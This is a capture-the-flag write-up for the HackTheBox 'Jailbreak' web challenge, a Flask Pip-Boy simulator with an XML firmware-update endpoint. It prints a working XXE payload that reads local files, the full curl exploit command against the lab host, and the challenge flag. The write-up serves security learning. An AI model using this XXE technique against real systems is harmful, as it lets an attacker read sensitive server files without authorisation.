Jailbreak
hackthebox
The crew secures an experimental Pip-Boy from a black market merchant, recognizing its potential to unlock the heavily guarded bunker of Vault 79. Back at their hideout, the hackers and engineers collaborate to jailbreak the device, working meticulously to bypass its sophisticated biometric locks. U
$ cat /etc/rate-limit
Rate limit reached (20 reads/hour per IP). Showing preview only — full content returns at the next hour roll-over.
Jailbreak - HackTheBox
Description
The crew secures an experimental Pip-Boy from a black market merchant, recognizing its potential to unlock the heavily guarded bunker of Vault 79. Back at their hideout, the hackers and engineers collaborate to jailbreak the device, working meticulously to bypass its sophisticated biometric locks. Using custom firmware and a series of precise modifications, can you bring the device to full operational status in order to pair it with the vault door's access port.
Target: 83.136.249.164:45064
Analysis
Initial Reconnaissance
Connected to the target and discovered a Flask/Werkzeug Python web application simulating a Pip-Boy device with multiple pages:
- STAT
- INV
- DATA
- MAP
- RADIO
- ROM
Vulnerability Discovery
- Found the
/rompage containing a "Firmware Update" feature - The page accepts XML configuration input
- Discovered
/static/js/update.jswhich reveals the API endpoint:- Endpoint:
POST /api/update - Content-Type:
application/xml
- Endpoint:
The XML parser does not properly sanitize external entities, making it vulnerable to XXE (XML External Entity) Injection.
Solution
XXE Payload
Crafted an XXE payload to read /flag.txt by defining an external entity that references the local file:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]> <FirmwareUpdateConfig> <Firmware> <Version>&xxe;</Version> <ReleaseDate>2077-10-21</ReleaseDate> <Description>Test</Description> <Checksum type="SHA-256">test</Checksum> </Firmware> </FirmwareUpdateConfig>
Exploit Command
curl -s -X POST http://83.136.249.164:45064/api/update \ -H "Content-Type: application/xml" \ -d '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]> <FirmwareUpdateConfig> <Firmware> <Version>&xxe;</Version> <ReleaseDate>2077-10-21</ReleaseDate> <Description>Test</Description> <Checksum type="SHA-256">test</Checksum> </Firmware> </FirmwareUpdateConfig>'
Response
{ "message": "Firmware version HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_465a1624a0deb4d0c01f93bffa85a977} update initiated." }
...
$ grep --similar
Similar writeups
- [mobile][free]Protected— HackTheBox
- [pentest][free]Interpreter (Mirth Connect → f-string Injection)— hackthebox
- [misc][free]Prison Pipeline— HackTheBox Business CTF 2024
- [reverse][free]TunnelMadness— hackthebox
- [web][free]Browsed— hackthebox